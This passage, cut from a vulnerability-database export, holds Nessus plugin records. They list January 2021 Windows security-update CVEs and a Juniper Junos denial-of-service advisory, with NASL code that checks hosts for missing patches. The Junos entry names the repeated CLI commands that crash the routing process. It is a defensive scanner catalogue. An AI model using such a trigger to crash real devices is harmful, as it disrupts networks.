(CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1649, CVE-2021-1652, CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659,\n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693,\n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702,\n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1656, CVE-2021-1676,\n CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. 
(CVE-2021-1679)", "edition": 5, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598289: Windows 7 and Windows Server 2008 R2 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1666", "CVE-2021-1664", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1673", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1708", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1660", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598279.NASL", "href": "https://www.tenable.com/plugins/nessus/144877", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144877);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\n \"CVE-2021-1649\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1688\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\"\n );\n script_xref(name:\"MSKB\", value:\"4598279\");\n script_xref(name:\"MSKB\", value:\"4598289\");\n script_xref(name:\"MSFT\", value:\"MS21-4598279\");\n script_xref(name:\"MSFT\", value:\"MS21-4598289\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598289: Windows 7 and Windows Server 2008 R2 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598289\nor cumulative update 4598279. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1649, CVE-2021-1652, CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659,\n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693,\n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702,\n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1656, CVE-2021-1676,\n CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. 
(CVE-2021-1679)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4598279/windows-7-update\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4598289/windows-7-update\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4598289 or Cumulative Update KB4598279.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598279',\n '4598289'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598279, 4598289])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T07:09:21", "description": "According to the self reported version of Junos OS on the remote device it is affected by a Denial of Service (DoS)\nvulnerability. 
By continuously executing the same CLI commands 'show ospf interface extensive' or 'show ospf interface\ndetail' CLI commands, a local attacker can repeatedly crash the RPD process causing a sustained Denial of Service.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 3, "cvss3": {"score": 5.5, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}, "published": "2020-07-17T00:00:00", "title": "Juniper Junos Denial of Service (DoS) JSA11030", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1643"], "modified": "2020-07-17T00:00:00", "cpe": ["cpe:/o:juniper:junos"], "id": "JUNIPER_JSA11030.NASL", "href": "https://www.tenable.com/plugins/nessus/138605", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138605);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/13\");\n\n script_cve_id(\"CVE-2020-1643\");\n script_xref(name:\"JSA\", value:\"JSA11030\");\n script_xref(name:\"IAVA\", value:\"2020-A-0320\");\n\n script_name(english:\"Juniper Junos Denial of Service (DoS) JSA11030\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the self reported version of Junos OS on the remote device it is affected by a Denial of Service (DoS)\nvulnerability. 
By continuously executing the same CLI commands 'show ospf interface extensive' or 'show ospf interface\ndetail' CLI commands, a local attacker can repeatedly crash the RPD process causing a sustained Denial of Service.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/JSA11030\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant Junos software release referenced in Juniper advisory JSA11030\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1643\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:juniper:junos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Junos Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"junos_version.nasl\");\n script_require_keys(\"Host/Juniper/JUNOS/Version\", \"Host/Juniper/model\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('junos.inc');\ninclude(\"hostlevel_funcs.inc\");\n\nver = get_kb_item_or_exit('Host/Juniper/JUNOS/Version');\nmodel = get_kb_item_or_exit('Host/Juniper/model');\nfixes = make_array();\n\n# Only systems utilizing ARM processors, found on the EX2300 and EX3400, are vulnerable to this issue.\nuname = get_kb_item_or_exit(\"Host/uname\");\nif(\"arm\" >!< tolower(uname) || (model !~ '^EX(23|34)00'))\n audit(AUDIT_HOST_NOT, \"affected\");\n\nfixes['12.3X48'] = '12.3X48-D100';\nfixes['14.1X53'] = '14.1X53-D54';\nfixes['15.1'] = '15.1R7-S7';\nfixes['15.1X49'] = '15.1X49-D210';\nfixes['15.1X53'] = '15.1X53-D593';\nfixes['16.1'] = '16.1R7-S8';\nfixes['17.1'] = '17.1R2-S12';\nfixes['17.2'] = '17.2R3-S4';\nfixes['17.3'] = '17.3R3-S8';\nfixes['17.4'] = '17.4R2-S2';\nfixes['18.1'] = '18.1R3-S2';\nfixes['18.2'] = '18.2R2';\nfixes['18.2X75'] = '18.2X75-D40';\nfixes['18.3'] = '18.3R1-S2';\n\nfix = check_junos(ver:ver, fixes:fixes, exit_on_fail:TRUE);\nreport = get_report(ver:ver, fix:fix);\nsecurity_report_v4(severity:SECURITY_NOTE, port:0, extra:report);", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-02-13T14:19:49", "description": "The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. 
script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598230'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598230])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-13T14:19:52", "description": "The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. 
(CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. 
(CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique\n from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. 
(CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. 
(CVE-2021-1690)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683,\n CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. 
(CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 6, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598245: Windows 10 Version 1803 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1684", "CVE-2021-1682", "CVE-2021-1681", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1710", "CVE-2021-1666", "CVE-2021-1685", "CVE-2021-1638", "CVE-2021-1687", "CVE-2021-1664", "CVE-2021-1697", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1669", "CVE-2021-1673", "CVE-2021-1662", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1642", "CVE-2021-1650", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1648", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1670", "CVE-2021-1689", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1680", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1651", "CVE-2021-1708", "CVE-2021-1672", "CVE-2021-1683", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1637", "CVE-2021-1686", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1663", "CVE-2021-1690", "CVE-2021-1660", "CVE-2021-1646", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657", "CVE-2021-1705"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598245.NASL", "href": "https://www.tenable.com/plugins/nessus/144880", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive 
text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144880);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/12\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1638\",\n \"CVE-2021-1642\",\n \"CVE-2021-1646\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1651\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1662\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1671\",\n \"CVE-2021-1672\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n \"CVE-2021-1682\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1685\",\n \"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n \"CVE-2021-1690\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0015\");\n script_xref(name:\"MSKB\", value:\"4598245\");\n script_xref(name:\"MSFT\", value:\"MS21-4598245\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598245: Windows 10 Version 1803 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", 
value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege 